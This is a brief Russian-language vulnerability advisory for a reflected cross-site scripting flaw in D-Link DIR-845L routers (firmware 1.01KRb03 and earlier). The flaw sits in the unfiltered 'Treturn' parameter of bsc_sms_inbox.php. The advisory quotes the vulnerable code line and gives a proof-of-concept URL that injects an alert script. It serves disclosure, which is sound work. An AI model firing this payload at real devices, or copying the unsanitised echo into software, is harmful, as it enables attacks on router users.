
Маршрутизатор D-Link DIR-845L уязвим для межсайтового скриптинга (XSS) через /htdocs/webinc/js/bsc_sms_inbox.php.
Маршрутизаторы D-Link DIR-845L версии 1.01KRb03 и ниже уязвимы к межсайтовому скриптингу (XSS) через /htdocs/webinc/js/bsc_sms_inbox.php.
/htdocs/webinc/js/bsc_sms_inbox.phpУязвимость обусловлена отсутствием фильтрации в параметре $_GET["Treturn"], который напрямую используется в коде на строке 17 файла bsc_sms_inbox.php.
Уязвимый фрагмент кода:
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
